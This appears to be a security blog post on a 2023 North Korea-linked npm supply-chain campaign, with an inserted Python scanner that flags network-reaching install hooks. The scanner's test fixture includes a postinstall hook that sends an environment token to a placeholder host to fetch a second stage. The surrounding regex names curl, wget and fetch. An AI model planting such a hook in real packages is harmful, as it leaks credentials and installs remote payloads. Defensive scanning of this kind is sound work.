
June's Sophisticated npm Attack Attributed to North Korea
Tags: Threat Defense, Threat Management
In June 2023, Phylum made a significant discovery
In June 2023, Phylum was the first to uncover a series of suspicious npm publications that seemed to be part of a highly targeted attack.
The Identified Packages and Their Installation Sequence
The identified packages, which were published in pairs, needed to be installed in a specific order. This sequence allowed for the retrieval of a token that enabled the download of a final malicious payload from a remote server. A recent security alert from GitHub has publicly linked this cyber-attack—an incident they were investigating independently—to threat actors with strong connections to North Korean objectives.
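The paragraph above describes a dependency that, once installed in the right order, reaches out to a remote server for its final payload. The page does not say how the packages executed on install; the example below assumes the common route of npm lifecycle scripts and is an added defensive check, not code from Phylum, GitHub or npm. It walks a node_modules tree, reads each package.json, and flags lifecycle hooks whose command looks like it contacts the network. The two package manifests it creates are constructed for illustration; the package names, the `example.invalid` host and the `TOKEN` variable are placeholders.

```python
"""Added defensive example (not Phylum's or GitHub's code): enumerate the npm
lifecycle scripts declared by installed packages and flag those that appear to
reach the network at install time.  The hook-based execution model is an
assumption; the page does not state how the malicious packages ran."""
import json
import os
import re
import tempfile

# Hooks npm runs automatically during `npm install` (assumed attack surface).
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic: a lifecycle command that embeds a URL or a download tool.
NETWORK_PATTERN = re.compile(
    r"(https?://|\bcurl\b|\bwget\b|\bfetch\b|\bhttp\.get\b)", re.IGNORECASE
)


def scan_node_modules(root):
    """Return sorted (package name, hook, command) triples for every installed
    package whose lifecycle script matches NETWORK_PATTERN."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if "package.json" not in filenames:
            continue
        try:
            with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
                manifest = json.load(fh)
        except (OSError, ValueError):
            # Unreadable or malformed manifest: skip it rather than abort the audit.
            continue
        scripts = manifest.get("scripts") or {}
        for hook in LIFECYCLE_HOOKS:
            command = scripts.get(hook)
            if isinstance(command, str) and NETWORK_PATTERN.search(command):
                name = manifest.get("name", os.path.basename(dirpath))
                findings.append((name, hook, command))
    return sorted(findings)


def build_sample_tree():
    """Create a constructed node_modules tree: one benign package and one whose
    postinstall hook fetches a second stage using a token (placeholder values)."""
    root = tempfile.mkdtemp(prefix="nm_demo_")
    samples = {
        "benign-util": {
            "name": "benign-util",
            "version": "1.0.0",
            "scripts": {"test": "node test.js"},
        },
        "pair-pkg-b": {
            "name": "pair-pkg-b",
            "version": "0.0.1",
            "scripts": {
                "postinstall": "node -e \"fetch('https://example.invalid/stage2?t='+process.env.TOKEN)\""
            },
        },
    }
    for name, manifest in samples.items():
        pkg_dir = os.path.join(root, "node_modules", name)
        os.makedirs(pkg_dir)
        with open(os.path.join(pkg_dir, "package.json"), "w", encoding="utf-8") as fh:
            json.dump(manifest, fh)
    return root


if __name__ == "__main__":
    for name, hook, command in scan_node_modules(build_sample_tree()):
        print(f"{name}: {hook} -> {command}")
```

Run it against a real checkout by passing the project root to `scan_node_modules`. A hit is a prompt for manual review, not proof of compromise; legitimate packages also download prebuilt binaries in `install` hooks. The complementary control is to disable lifecycle scripts by default (`ignore-scripts=true` in `.npmrc`) and allow them per package.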
The GitHub Security Alert: Insights from July 2023
On July 18, 2023, GitHub published a security alert on their blog. This alert provided additional insights into a recent attack, which they had been investigating in collaboration with npm, their subsidiary.
They described it as a low-volume social engineering campaign
They characterized it as a "low-volume social engineering campaign that targets the personal accounts of employees of technology firms." Furthermore, they stated the following: We assess with high confidence that this campaign is linked to a group that operates in support of North Korean objectives, referred to as Jade Sleet by Microsoft Threat Intelligence and TraderTraitor by the U.S.